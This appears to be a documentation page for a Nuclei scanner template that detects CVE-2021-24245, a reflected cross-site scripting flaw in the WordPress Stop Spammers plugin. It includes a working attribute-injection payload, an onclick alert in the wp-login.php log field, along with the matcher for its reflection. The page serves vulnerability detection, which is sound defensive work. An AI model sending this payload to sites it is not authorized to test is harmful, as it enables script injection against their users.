WordPress Stop Spammers <2021.9 - Cross-Site Scripting
ID: CVE-2021-24245
Severity: medium
Author: edoardottt
Tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,packetstorm,trumani
Description
Section titled “Description”WordPress Stop Spammers plugin before 2021.9 contains a reflected cross-site scripting vulnerability. It does not escape user input when blocking requests (such as matching a spam word), thus outputting it in an attribute after sanitizing it to remove HTML tags.
YAML Source
Section titled “YAML Source”id: CVE-2021-24245
info: name: WordPress Stop Spammers <2021.9 - Cross-Site Scripting author: edoardottt severity: medium description: WordPress Stop Spammers plugin before 2021.9 contains a reflected cross-site scripting vulnerability. It does not escape user input when blocking requests (such as matching a spam word), thus outputting it in an attribute after sanitizing it to remove HTML tags. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | Update to the latest version of the WordPress Stop Spammers plugin (2021.9 or later) to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/162623/WordPress-Stop-Spammers-2021.8-Cross-Site-Scripting.html - https://wpscan.com/vulnerability/5e7accd6-08dc-4c6e-9d19-73e2d7e97735 - https://nvd.nist.gov/vuln/detail/CVE-2021-24245 - http://packetstormsecurity.com/files/162623/WordPress-Stop-Spammers-2021.8-Cross-Site-Scripting.html - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24245 cwe-id: CWE-79 epss-score: 0.00231 epss-percentile: 0.60494 cpe: cpe:2.3:a:trumani:stop_spammers:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: trumani product: "stop_spammers" framework: wordpress tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,packetstorm,trumaniflow: http(1) && http(2)
http: - raw: - | GET /wp-content/plugins/stop-spammer-registrations-plugin/readme.txt HTTP/1.1 Host: {{Hostname}}
matchers: - type: word internal: true words: - 'Stop Spammers Spam Prevention' - 'Tags:' condition: and
- raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP+Cookie+check;
log=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1
matchers-condition: and matchers: - type: word part: header words: - "text/html"
- type: word part: body words: - "ad\" accesskey=X onclick=alert(1)"
- type: status status: - 200# digest: 4a0a004730450221008fe5c5adc3aa5aeba8ac0e577acd182c85b4c467e9af4dddda5098a42249647e0220456c6b94e1d2c933075d5b667ba6579d2dd1e9f696edc1f422560308e5e377a7:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24245.yaml"